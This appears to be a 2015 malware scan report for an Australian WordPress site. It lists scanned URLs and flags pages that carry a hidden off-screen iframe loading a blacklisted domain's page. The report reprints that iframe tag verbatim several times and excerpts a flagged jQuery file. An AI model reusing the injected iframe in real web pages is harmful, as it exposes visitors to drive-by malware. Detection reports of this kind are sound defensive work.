Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=thecharge.com.au
Result: The website is marked by Google as suspicious; visiting this website may harm your computer.
Scanned pages/files
Request | Server response | Status |
http://www.thecharge.com.au/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 07 Mar 2015 11:40:18 GMT Location: http://thecharge.com.au/ Server: nginx Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Pingback: http://thecharge.com.au/xmlrpc.php X-Powered-By: PHP/5.3.29 | clean |
http://thecharge.com.au/ | 200 OK Content-Length: 42558 Content-Type: text/html | malicious |
Page code contains blacklisted domain: capemadefieldguide.org
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xmlns:fb="http://ogp.me/ns/fb#" xmlns:addthis="http://www.addthis.com/help/api-spec" prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb#"> <head profile="http://gmpg.org/xfn/11"> <meta http-equiv="Content-Type" content="text/html; charset=UTF ...[4252 bytes skipped]...
Malicious iFrame found. size: 443x66 src: http://capemadefieldguide.org/ram.html
This URL is marked by Yandex as suspicious
<iframe src="http://capemadefieldguide.org/ram.html" width="443" height="66" style="position:absolute;left:-77721px;"> | ||
http://thecharge.com.au/wp-content/themes/nightclubbing/js/jquery.min.js | 200 OK Content-Length: 72143 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
(function(A,w){function ma(){if(!c.isReady){try{s.documentElement.doScroll("left")}catch(a){setTimeout(ma,1);return}c.ready()}}function Qa(a,b){b.src?c.ajax({url:b.src,async:false,dataType:"script"}):c.globalEval(b.text||b.textContent||b.innerHTML||"");b.parentNode&&b.parentNode.removeChild(b)}function X(a,b,d,f,e,j){var i=a.length;if(typeof b==="object"){for(var o in b)X(a,o,b[o],f,e,d);return a}if(d!==w){f=!j&&f&&c.isFunction(d);for(o=0;o<i;o++)e(a[o],b,f?d.call(a[o] e&&e.document?e.document.compatMode==="CSS1Compat"&&e.document.documentElement["client"+b]||e.document.body["client"+b]:e.nodeType===9?Math.max(e.documentElement["client"+b],e.body["scroll"+b],e.documentElement["scroll"+b],e.body["offset"+b],e.documentElement["offset"+b]):f===w?c.css(e,d):this.css(d,typeof f==="string"?f:f+"px"
Antivirus reports:
| ||
http://thecharge.com.au/wp-content/themes/nightclubbing/js/jquery.aw-showcase.js | 200 OK Content-Length: 29455 Content-Type: application/javascript | clean |
http://thecharge.com.au/wp-content/themes/nightclubbing/js/cufon.js | 200 OK Content-Length: 18258 Content-Type: application/javascript | clean |
http://thecharge.com.au/wp-content/themes/nightclubbing/js/texgyreadventor.js | 200 OK Content-Length: 17505 Content-Type: application/javascript | clean |
http://thecharge.com.au/wp-includes/js/jquery/jquery.js?ver=1.11.1 | 200 OK Content-Length: 95807 Content-Type: application/javascript | clean |
http://thecharge.com.au/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7200 Content-Type: application/javascript | clean |
http://thecharge.com.au/wp-content/plugins/nextgen-gallery/js/jquery.cycle.all.min.js?ver=2.9995 | 200 OK Content-Length: 26590 Content-Type: application/javascript | clean |
http://thecharge.com.au/wp-content/plugins/nextgen-gallery/js/ngg.slideshow.min.js?ver=1.05 | 200 OK Content-Length: 1750 Content-Type: application/javascript | clean |
http://thecharge.com.au/wp-content/plugins/fancybox-for-wordpress/fancybox/jquery.fancybox.js?ver=1.3.4 | 200 OK Content-Length: 15669 Content-Type: application/javascript | clean |
http://www.thecharge.com.au//s7.addthis.com/js/300/addthis_widget.js/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Sat, 07 Mar 2015 11:40:39 GMT Pragma: no-cache Location: http://thecharge.com.au/s7.addthis.com/js/300/addthis_widget.js/ Server: nginx Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT X-Pingback: http://thecharge.com.au/xmlrpc.php X-Powered-By: PHP/5.3.29 | clean |
http://thecharge.com.au/s7.addthis.com/js/300/addthis_widget.js/ | 404 Not Found Content-Length: 42450 Content-Type: text/html | malicious |
Page code contains blacklisted domain: capemadefieldguide.org
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xmlns:fb="http://ogp.me/ns/fb#" xmlns:addthis="http://www.addthis.com/help/api-spec" prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb#"> <head profile="http://gmpg.org/xfn/11"> <meta http-equiv="Content-Type" content="text/html; charset=UTF ...[4252 bytes skipped]...
Malicious iFrame found. size: 443x66 src: http://capemadefieldguide.org/ram.html
This URL is marked by Yandex as suspicious
<iframe src="http://capemadefieldguide.org/ram.html" width="443" height="66" style="position:absolute;left:-77721px;"> | ||
http://thecharge.com.au//s7.addthis.com/js/300/addthis_widget.js/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Sat, 07 Mar 2015 11:40:42 GMT Pragma: no-cache Location: http://thecharge.com.au/s7.addthis.com/js/300/addthis_widget.js/ Server: nginx Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT X-Pingback: http://thecharge.com.au/xmlrpc.php X-Powered-By: PHP/5.3.29 | clean |
http://thecharge.com.au/test404page.js | 404 Not Found Content-Length: 42263 Content-Type: text/html | malicious |
Page code contains blacklisted domain: capemadefieldguide.org
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xmlns:fb="http://ogp.me/ns/fb#" xmlns:addthis="http://www.addthis.com/help/api-spec" prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb#"> <head profile="http://gmpg.org/xfn/11"> <meta http-equiv="Content-Type" content="text/html; charset=UTF ...[4252 bytes skipped]...
Malicious iFrame found. size: 443x66 src: http://capemadefieldguide.org/ram.html
This URL is marked by Yandex as suspicious
<iframe src="http://capemadefieldguide.org/ram.html" width="443" height="66" style="position:absolute;left:-77721px;"> | ||
http://thecharge.com.au/gigs/ | 200 OK Content-Length: 26690 Content-Type: text/html | malicious |
Page code contains blacklisted domain: capemadefieldguide.org
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xmlns:fb="http://ogp.me/ns/fb#" xmlns:addthis="http://www.addthis.com/help/api-spec" prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb#"> <head profile="http://gmpg.org/xfn/11"> <meta http-equiv="Content-Type" content="text/html; charset=UTF ...[4252 bytes skipped]...
Malicious iFrame found. size: 443x66 src: http://capemadefieldguide.org/ram.html
This URL is marked by Yandex as suspicious
<iframe src="http://capemadefieldguide.org/ram.html" width="443" height="66" style="position:absolute;left:-77721px;"> | ||
http://thecharge.com.au/online-store/ | 200 OK Content-Length: 29267 Content-Type: text/html | malicious |
Page code contains blacklisted domain: capemadefieldguide.org
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xmlns:fb="http://ogp.me/ns/fb#" xmlns:addthis="http://www.addthis.com/help/api-spec" prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb#"> <head profile="http://gmpg.org/xfn/11"> <meta http-equiv="Content-Type" content="text/html; charset=UTF ...[4252 bytes skipped]...
Malicious iFrame found. size: 443x66 src: http://capemadefieldguide.org/ram.html
This URL is marked by Yandex as suspicious
<iframe src="http://capemadefieldguide.org/ram.html" width="443" height="66" style="position:absolute;left:-77721px;"> | ||
http://thecharge.com.au/photos/ | 200 OK Content-Length: 28467 Content-Type: text/html | malicious |
Page code contains blacklisted domain: capemadefieldguide.org
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xmlns:fb="http://ogp.me/ns/fb#" xmlns:addthis="http://www.addthis.com/help/api-spec" prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb#"> <head profile="http://gmpg.org/xfn/11"> <meta http-equiv="Content-Type" content="text/html; charset=UTF ...[4252 bytes skipped]...
Malicious iFrame found. size: 443x66 src: http://capemadefieldguide.org/ram.html
This URL is marked by Yandex as suspicious
<iframe src="http://capemadefieldguide.org/ram.html" width="443" height="66" style="position:absolute;left:-77721px;"> |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: thecharge.com.au
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 07 Mar 2015 11:40:19 GMT
Server: nginx
Vary: Accept-Encoding
Content-Length: 42558
Content-Type: text/html; charset=UTF-8
X-Pingback: http://thecharge.com.au/xmlrpc.php
X-Powered-By: PHP/5.3.29
...42558 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: thecharge.com.au
Referer: http://www.google.com/search?q=thecharge.com.au
Result:
The result is similar to the first query. There are no suspicious redirects found.